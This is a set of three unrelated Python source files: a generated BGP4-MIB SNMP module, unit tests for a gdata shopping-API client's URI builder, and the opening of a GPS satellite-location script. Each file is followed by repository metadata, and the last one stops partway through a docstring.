Unsigned32, Counter32, ModuleIdentity, MibIdentifier, NotificationType, Gauge32, Integer32, iso, Bits, TimeTicks, IpAddress, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, mib_2 = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "Counter32", "ModuleIdentity", "MibIdentifier", "NotificationType", "Gauge32", "Integer32", "iso", "Bits", "TimeTicks", "IpAddress", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "mib-2")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
bgp = ModuleIdentity((1, 3, 6, 1, 2, 1, 15))
if mibBuilder.loadTexts: bgp.setLastUpdated('9405050000Z')
if mibBuilder.loadTexts: bgp.setOrganization('IETF BGP Working Group')
if mibBuilder.loadTexts: bgp.setContactInfo(' John Chu (Editor) Postal: IBM Corp. P.O.Box 218 Yorktown Heights, NY 10598 US Tel: +1 914 945 3156 Fax: +1 914 945 2141 E-mail: jychu@watson.ibm.com')
if mibBuilder.loadTexts: bgp.setDescription('The MIB module for BGP-4.')
bgpVersion = MibScalar((1, 3, 6, 1, 2, 1, 15, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpVersion.setStatus('current')
if mibBuilder.loadTexts: bgpVersion.setDescription('Vector of supported BGP protocol version numbers. Each peer negotiates the version from this vector. Versions are identified via the string of bits contained within this object. The first octet contains bits 0 to 7, the second octet contains bits 8 to 15, and so on, with the most significant bit referring to the lowest bit number in the octet (e.g., the MSB of the first octet refers to bit 0). If a bit, i, is present and set, then the version (i+1) of the BGP is supported.')
bgpLocalAs = MibScalar((1, 3, 6, 1, 2, 1, 15, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpLocalAs.setStatus('current')
if mibBuilder.loadTexts: bgpLocalAs.setDescription('The local autonomous system number.')
bgpPeerTable = MibTable((1, 3, 6, 1, 2, 1, 15, 3), )
if mibBuilder.loadTexts: bgpPeerTable.setStatus('current')
if mibBuilder.loadTexts: bgpPeerTable.setDescription('BGP peer table. This table contains, one entry per BGP peer, information about the connections with BGP peers.')
bgpPeerEntry = MibTableRow((1, 3, 6, 1, 2, 1, 15, 3, 1), ).setIndexNames((0, "BGP4-MIB", "bgpPeerRemoteAddr"))
if mibBuilder.loadTexts: bgpPeerEntry.setStatus('current')
if mibBuilder.loadTexts: bgpPeerEntry.setDescription('Entry containing information about the connection with a BGP peer.')
bgpPeerIdentifier = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerIdentifier.setStatus('current')
if mibBuilder.loadTexts: bgpPeerIdentifier.setDescription("The BGP Identifier of this entry's BGP peer.")
bgpPeerState = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("idle", 1), ("connect", 2), ("active", 3), ("opensent", 4), ("openconfirm", 5), ("established", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerState.setStatus('current')
if mibBuilder.loadTexts: bgpPeerState.setDescription('The BGP peer connection state.')
bgpPeerAdminStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("stop", 1), ("start", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerAdminStatus.setStatus('current')
if mibBuilder.loadTexts: bgpPeerAdminStatus.setDescription("The desired state of the BGP connection. A transition from 'stop' to 'start' will cause the BGP Start Event to be generated. A transition from 'start' to 'stop' will cause the BGP Stop Event to be generated. This parameter can be used to restart BGP peer connections. Care should be used in providing write access to this object without adequate authentication.")
bgpPeerNegotiatedVersion = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerNegotiatedVersion.setStatus('current')
if mibBuilder.loadTexts: bgpPeerNegotiatedVersion.setDescription('The negotiated version of BGP running between the two peers.')
bgpPeerLocalAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 5), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerLocalAddr.setStatus('current')
if mibBuilder.loadTexts: bgpPeerLocalAddr.setDescription("The local IP address of this entry's BGP connection.")
bgpPeerLocalPort = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerLocalPort.setStatus('current')
if mibBuilder.loadTexts: bgpPeerLocalPort.setDescription('The local port for the TCP connection between the BGP peers.')
bgpPeerRemoteAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 7), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerRemoteAddr.setStatus('current')
if mibBuilder.loadTexts: bgpPeerRemoteAddr.setDescription("The remote IP address of this entry's BGP peer.")
bgpPeerRemotePort = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerRemotePort.setStatus('current')
if mibBuilder.loadTexts: bgpPeerRemotePort.setDescription('The remote port for the TCP connection between the BGP peers. Note that the objects bgpPeerLocalAddr, bgpPeerLocalPort, bgpPeerRemoteAddr and bgpPeerRemotePort provide the appropriate reference to the standard MIB TCP connection table.')
bgpPeerRemoteAs = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerRemoteAs.setStatus('current')
if mibBuilder.loadTexts: bgpPeerRemoteAs.setDescription('The remote autonomous system number.')
bgpPeerInUpdates = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerInUpdates.setStatus('current')
if mibBuilder.loadTexts: bgpPeerInUpdates.setDescription('The number of BGP UPDATE messages received on this connection. This object should be initialized to zero (0) when the connection is established.')
bgpPeerOutUpdates = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerOutUpdates.setStatus('current')
if mibBuilder.loadTexts: bgpPeerOutUpdates.setDescription('The number of BGP UPDATE messages transmitted on this connection. This object should be initialized to zero (0) when the connection is established.')
bgpPeerInTotalMessages = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerInTotalMessages.setStatus('current')
if mibBuilder.loadTexts: bgpPeerInTotalMessages.setDescription('The total number of messages received from the remote peer on this connection. This object should be initialized to zero when the connection is established.')
bgpPeerOutTotalMessages = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerOutTotalMessages.setStatus('current')
if mibBuilder.loadTexts: bgpPeerOutTotalMessages.setDescription('The total number of messages transmitted to the remote peer on this connection. This object should be initialized to zero when the connection is established.')
bgpPeerLastError = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 14), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerLastError.setStatus('current')
if mibBuilder.loadTexts: bgpPeerLastError.setDescription('The last error code and subcode seen by this peer on this connection. If no error has occurred, this field is zero. Otherwise, the first byte of this two byte OCTET STRING contains the error code, and the second byte contains the subcode.')
bgpPeerFsmEstablishedTransitions = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTransitions.setStatus('current')
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTransitions.setDescription('The total number of times the BGP FSM transitioned into the established state.')
bgpPeerFsmEstablishedTime = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 16), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTime.setStatus('current')
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTime.setDescription('This timer indicates how long (in seconds) this peer has been in the Established state or how long since this peer was last in the Established state. It is set to zero when a new peer is configured or the router is booted.')
bgpPeerConnectRetryInterval = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 17), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerConnectRetryInterval.setStatus('current')
if mibBuilder.loadTexts: bgpPeerConnectRetryInterval.setDescription('Time interval in seconds for the ConnectRetry timer. The suggested value for this timer is 120 seconds.')
bgpPeerHoldTime = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(3, 65535), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerHoldTime.setStatus('current')
if mibBuilder.loadTexts: bgpPeerHoldTime.setDescription('Time interval in seconds for the Hold Timer established with the peer. The value of this object is calculated by this BGP speaker by using the smaller of the value in bgpPeerHoldTimeConfigured and the Hold Time received in the OPEN message. This value must be at lease three seconds if it is not zero (0) in which case the Hold Timer has not been established with the peer, or, the value of bgpPeerHoldTimeConfigured is zero (0).')
bgpPeerKeepAlive = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(1, 21845), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerKeepAlive.setStatus('current')
if mibBuilder.loadTexts: bgpPeerKeepAlive.setDescription('Time interval in seconds for the KeepAlive timer established with the peer. The value of this object is calculated by this BGP speaker such that, when compared with bgpPeerHoldTime, it has the same proportion as what bgpPeerKeepAliveConfigured has when compared with bgpPeerHoldTimeConfigured. If the value of this object is zero (0), it indicates that the KeepAlive timer has not been established with the peer, or, the value of bgpPeerKeepAliveConfigured is zero (0).')
bgpPeerHoldTimeConfigured = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(3, 65535), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerHoldTimeConfigured.setStatus('current')
if mibBuilder.loadTexts: bgpPeerHoldTimeConfigured.setDescription('Time interval in seconds for the Hold Time configured for this BGP speaker with this peer. This value is placed in an OPEN message sent to this peer by this BGP speaker, and is compared with the Hold Time field in an OPEN message received from the peer when determining the Hold Time (bgpPeerHoldTime) with the peer. This value must not be less than three seconds if it is not zero (0) in which case the Hold Time is NOT to be established with the peer. The suggested value for this timer is 90 seconds.')
bgpPeerKeepAliveConfigured = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 21), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(1, 21845), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerKeepAliveConfigured.setStatus('current')
if mibBuilder.loadTexts: bgpPeerKeepAliveConfigured.setDescription("Time interval in seconds for the KeepAlive timer configured for this BGP speaker with this peer. The value of this object will only determine the KEEPALIVE messages' frequency relative to the value specified in bgpPeerHoldTimeConfigured; the actual time interval for the KEEPALIVE messages is indicated by bgpPeerKeepAlive. A reasonable maximum value for this timer would be configured to be one third of that of bgpPeerHoldTimeConfigured. If the value of this object is zero (0), no periodical KEEPALIVE messages are sent to the peer after the BGP connection has been established. The suggested value for this timer is 30 seconds.")
bgpPeerMinASOriginationInterval = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 22), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerMinASOriginationInterval.setStatus('current')
if mibBuilder.loadTexts: bgpPeerMinASOriginationInterval.setDescription('Time interval in seconds for the MinASOriginationInterval timer. The suggested value for this timer is 15 seconds.')
bgpPeerMinRouteAdvertisementInterval = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 23), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerMinRouteAdvertisementInterval.setStatus('current')
if mibBuilder.loadTexts: bgpPeerMinRouteAdvertisementInterval.setDescription('Time interval in seconds for the MinRouteAdvertisementInterval timer. The suggested value for this timer is 30 seconds.')
bgpPeerInUpdateElapsedTime = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 24), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerInUpdateElapsedTime.setStatus('current')
if mibBuilder.loadTexts: bgpPeerInUpdateElapsedTime.setDescription('Elapsed time in seconds since the last BGP UPDATE message was received from the peer. Each time bgpPeerInUpdates is incremented, the value of this object is set to zero (0).')
bgpIdentifier = MibScalar((1, 3, 6, 1, 2, 1, 15, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpIdentifier.setStatus('current')
if mibBuilder.loadTexts: bgpIdentifier.setDescription('The BGP Identifier of local system.')
bgp4PathAttrTable = MibTable((1, 3, 6, 1, 2, 1, 15, 6), )
if mibBuilder.loadTexts: bgp4PathAttrTable.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrTable.setDescription('The BGP-4 Received Path Attribute Table contains information about paths to destination networks received from all BGP4 peers.')
bgp4PathAttrEntry = MibTableRow((1, 3, 6, 1, 2, 1, 15, 6, 1), ).setIndexNames((0, "BGP4-MIB", "bgp4PathAttrIpAddrPrefix"), (0, "BGP4-MIB", "bgp4PathAttrIpAddrPrefixLen"), (0, "BGP4-MIB", "bgp4PathAttrPeer"))
if mibBuilder.loadTexts: bgp4PathAttrEntry.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrEntry.setDescription('Information about a path to a network.')
bgp4PathAttrPeer = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrPeer.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrPeer.setDescription('The IP address of the peer where the path information was learned.')
bgp4PathAttrIpAddrPrefixLen = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefixLen.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefixLen.setDescription('Length in bits of the IP address prefix in the Network Layer Reachability Information field.')
bgp4PathAttrIpAddrPrefix = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefix.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefix.setDescription('An IP address prefix in the Network Layer Reachability Information field. This object is an IP address containing the prefix with length specified by bgp4PathAttrIpAddrPrefixLen. Any bits beyond the length specified by bgp4PathAttrIpAddrPrefixLen are zeroed.')
bgp4PathAttrOrigin = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("igp", 1), ("egp", 2), ("incomplete", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrOrigin.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrOrigin.setDescription('The ultimate origin of the path information.')
bgp4PathAttrASPathSegment = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrASPathSegment.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrASPathSegment.setDescription('The sequence of AS path segments. Each AS path segment is represented by a triple <type, length, value>. The type is a 1-octet field which has two possible values: 1 AS_SET: unordered set of ASs a route in the UPDATE message has traversed 2 AS_SEQUENCE: ordered set of ASs a route in the UPDATE message has traversed. The length is a 1-octet field containing the number of ASs in the value field. The value field contains one or more AS numbers, each AS is represented in the octet string as a pair of octets according to the following algorithm: first-byte-of-pair = ASNumber / 256; second-byte-of-pair = ASNumber & 255;')
bgp4PathAttrNextHop = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 6), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrNextHop.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrNextHop.setDescription('The address of the border router that should be used for the destination network.')
bgp4PathAttrMultiExitDisc = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrMultiExitDisc.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrMultiExitDisc.setDescription('This metric is used to discriminate between multiple exit points to an adjacent autonomous system. A value of -1 indicates the absence of this attribute.')
bgp4PathAttrLocalPref = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrLocalPref.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrLocalPref.setDescription("The originating BGP4 speaker's degree of preference for an advertised route. A value of -1 indicates the absence of this attribute.")
bgp4PathAttrAtomicAggregate = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("lessSpecificRrouteNotSelected", 1), ("lessSpecificRouteSelected", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrAtomicAggregate.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrAtomicAggregate.setDescription('Whether or not the local system has selected a less specific route without selecting a more specific route.')
bgp4PathAttrAggregatorAS = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAS.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAS.setDescription('The AS number of the last BGP4 speaker that performed route aggregation. A value of zero (0) indicates the absence of this attribute.')
bgp4PathAttrAggregatorAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 11), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAddr.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAddr.setDescription('The IP address of the last BGP4 speaker that performed route aggregation. A value of 0.0.0.0 indicates the absence of this attribute.')
bgp4PathAttrCalcLocalPref = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrCalcLocalPref.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrCalcLocalPref.setDescription('The degree of preference calculated by the receiving BGP4 speaker for an advertised route. A value of -1 indicates the absence of this attribute.')
bgp4PathAttrBest = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("false", 1), ("true", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrBest.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrBest.setDescription('An indication of whether or not this route was chosen as the best BGP4 route.')
bgp4PathAttrUnknown = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 14), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrUnknown.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrUnknown.setDescription('One or more path attributes not understood by this BGP4 speaker. Size zero (0) indicates the absence of such attribute(s). Octets beyond the maximum size, if any, are not recorded by this object.')
bgpTraps = MibIdentifier((1, 3, 6, 1, 2, 1, 15, 7))
bgpEstablished = NotificationType((1, 3, 6, 1, 2, 1, 15, 7, 1)).setObjects(("BGP4-MIB", "bgpPeerLastError"), ("BGP4-MIB", "bgpPeerState"))
if mibBuilder.loadTexts: bgpEstablished.setStatus('current')
if mibBuilder.loadTexts: bgpEstablished.setDescription('The BGP Established event is generated when the BGP FSM enters the ESTABLISHED state.')
bgpBackwardTransition = NotificationType((1, 3, 6, 1, 2, 1, 15, 7, 2)).setObjects(("BGP4-MIB", "bgpPeerLastError"), ("BGP4-MIB", "bgpPeerState"))
if mibBuilder.loadTexts: bgpBackwardTransition.setStatus('current')
if mibBuilder.loadTexts: bgpBackwardTransition.setDescription('The BGPBackwardTransition Event is generated when the BGP FSM moves from a higher numbered state to a lower numbered state.')
mibBuilder.exportSymbols("BGP4-MIB", bgpPeerInUpdates=bgpPeerInUpdates, bgpPeerAdminStatus=bgpPeerAdminStatus, bgp4PathAttrMultiExitDisc=bgp4PathAttrMultiExitDisc, bgp4PathAttrAtomicAggregate=bgp4PathAttrAtomicAggregate, bgp4PathAttrUnknown=bgp4PathAttrUnknown, bgpPeerFsmEstablishedTime=bgpPeerFsmEstablishedTime, bgpPeerInUpdateElapsedTime=bgpPeerInUpdateElapsedTime, bgpPeerState=bgpPeerState, bgpPeerNegotiatedVersion=bgpPeerNegotiatedVersion, PYSNMP_MODULE_ID=bgp, bgpVersion=bgpVersion, bgp4PathAttrTable=bgp4PathAttrTable, bgpEstablished=bgpEstablished, bgp4PathAttrPeer=bgp4PathAttrPeer, bgpPeerLastError=bgpPeerLastError, bgpPeerOutUpdates=bgpPeerOutUpdates, bgpPeerRemotePort=bgpPeerRemotePort, bgpPeerLocalAddr=bgpPeerLocalAddr, bgpPeerKeepAliveConfigured=bgpPeerKeepAliveConfigured, bgp4PathAttrEntry=bgp4PathAttrEntry, bgp4PathAttrNextHop=bgp4PathAttrNextHop, bgpBackwardTransition=bgpBackwardTransition, bgpPeerInTotalMessages=bgpPeerInTotalMessages, bgp4PathAttrLocalPref=bgp4PathAttrLocalPref, bgp=bgp, bgpLocalAs=bgpLocalAs, bgpPeerRemoteAs=bgpPeerRemoteAs, bgp4PathAttrASPathSegment=bgp4PathAttrASPathSegment, bgp4PathAttrAggregatorAddr=bgp4PathAttrAggregatorAddr, bgpPeerLocalPort=bgpPeerLocalPort, bgp4PathAttrCalcLocalPref=bgp4PathAttrCalcLocalPref, bgp4PathAttrAggregatorAS=bgp4PathAttrAggregatorAS, bgpPeerHoldTime=bgpPeerHoldTime, bgpPeerMinRouteAdvertisementInterval=bgpPeerMinRouteAdvertisementInterval, bgp4PathAttrIpAddrPrefix=bgp4PathAttrIpAddrPrefix, bgpPeerIdentifier=bgpPeerIdentifier, bgpPeerRemoteAddr=bgpPeerRemoteAddr, bgpPeerKeepAlive=bgpPeerKeepAlive, bgpPeerFsmEstablishedTransitions=bgpPeerFsmEstablishedTransitions, bgp4PathAttrOrigin=bgp4PathAttrOrigin, bgpPeerMinASOriginationInterval=bgpPeerMinASOriginationInterval, bgp4PathAttrIpAddrPrefixLen=bgp4PathAttrIpAddrPrefixLen, bgp4PathAttrBest=bgp4PathAttrBest, bgpPeerTable=bgpPeerTable, bgpPeerConnectRetryInterval=bgpPeerConnectRetryInterval, bgpPeerHoldTimeConfigured=bgpPeerHoldTimeConfigured, bgpIdentifier=bgpIdentifier, bgpTraps=bgpTraps, bgpPeerOutTotalMessages=bgpPeerOutTotalMessages, bgpPeerEntry=bgpPeerEntry)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
9d06f25c74335110a8269e61dfd06f9c67088181 | 71afd03278068857a979ba57b0892d4fb44387a2 | /tests/gdata_tests/contentforshopping_test.py | 79666626f5450b26025b783ea41c70cf440e3e2f | [
"Apache-2.0"
] | permissive | dvska/gdata-python3 | 9848717aca61f9e34ebfc3b4b291c6f75aaabc4b | a34c35901473e4ba7223ea4607136141301fbe88 | refs/heads/master | 2021-06-02T20:42:37.570392 | 2020-12-24T10:17:47 | 2020-12-24T10:17:47 | 93,769,460 | 19 | 25 | Apache-2.0 | 2020-12-24T10:17:49 | 2017-06-08T16:18:42 | Python | UTF-8 | Python | false | false | 3,411 | py | #
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License 2.0;
"""Content API for Shopping tests"""
# __author__ = 'afshar (Ali Afshar)'
import unittest
from gdata.contentforshopping import client
class CFSClientTest(unittest.TestCase):
def test_uri_missing_account_id(self):
c = client.ContentForShoppingClient()
self.assertRaises(ValueError, c._create_uri,
account_id=None, projection=None, resource='a/b')
def test_uri_bad_projection(self):
c = client.ContentForShoppingClient()
self.assertRaises(ValueError, c._create_uri,
account_id='123', projection='banana', resource='a/b')
def test_good_default_account_id(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='a/b')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/generic')
def test_override_request_account_id(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id='321', projection=None, resource='a/b')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/321/a/b/generic')
def test_default_projection(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='a/b')
self.assertEqual(c.cfs_projection, 'generic')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/generic')
def test_default_projection_change(self):
c = client.ContentForShoppingClient(account_id='123', projection='schema')
uri = c._create_uri(account_id=None, projection=None, resource='a/b')
self.assertEqual(c.cfs_projection, 'schema')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/schema')
def test_request_projection(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection='schema', resource='a/b')
self.assertEqual(c.cfs_projection, 'generic')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/schema')
def test_request_resource(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='x/y/z')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/x/y/z/generic')
def test_path_single(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='r',
path=['1'])
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/r/generic/1')
def test_path_multiple(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='r',
path=['1', '2'])
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/r/generic/1/2')
if __name__ == '__main__':
unittest.main()
| [
"OR"
] | OR |
58b963b434f59c65974163b99df220974713b385 | 02779ff959cf88513d44162cf4ab076bb23cb471 | /satloc.py | a28b0b0ba143c660b6175e0b295e6b971bfc4839 | [] | no_license | WillFife/SatNav | 5432f970946c1d4c983dd39621042fbdc4582324 | 49520aa532f6e19b20b05a9fb5af0345c2e20683 | refs/heads/master | 2023-01-03T20:17:30.540351 | 2020-10-30T19:26:04 | 2020-10-30T19:26:04 | 291,811,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,852 | py | """
Retrieve the CSV file for navigation data for the
32 possible satellites at a time given by GPS week and GPS seconds.
Also create a CSV of the ECEF position and velocities from the given navigation data.
@author: William Fife
"""
# import dependencies
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import astropy.units as u
import sys
import os
# SatNav imports
from mathUtils import *
from datafile import DataFile
from wgs84 import wgs84Constants, WGS84, OrbitalMath
from time_conv import *
DIR = 'data/lab3/'
def createNavDataCsv(gpsWeek, gpsSec, navdir=DIR[:-1]):
print('--- Creating navData csv for GPS week {}, GPS Sec {} s ---'.format(gpsWeek, gpsSec))
# import matlab runner for extracting nav data
sys.path.insert(1, '/Applications/MATLAB_R2020a.app')
import matlab.engine
# Compute UTC time to give to matlab function 'RetrieveNavigationData.m'
utc = gps2utc(gpsWeek, gpsSec)
utc_str = '{}'.format(str(utc))
print(utc_str)
# Access matlab function and create csv
try:
eng = matlab.engine.start_matlab()
eng.retrieveNavigationData(float(gpsWeek), float(gpsSec), utc_str, 0, navdir, nargout=0)
eng.quit()
except Exception as e:
print("\nSomething went wrong with MATLAB... here is the exception")
print(e)
def satloc(gpsWeek, gpsSec, svID, navdir=DIR, usefile=None, printSat=False):
"""
Return satellite position and velocity expressed in and relative
to the ECEF reference frame.
Inputs:
gpsWeek - Week of true time at which satellite ECEF state is desired
gpsSec - Seconds of week
svID - The satellite PRN number
Outputs:
r_sv_ecef - Position of satellite in ECEF [m]
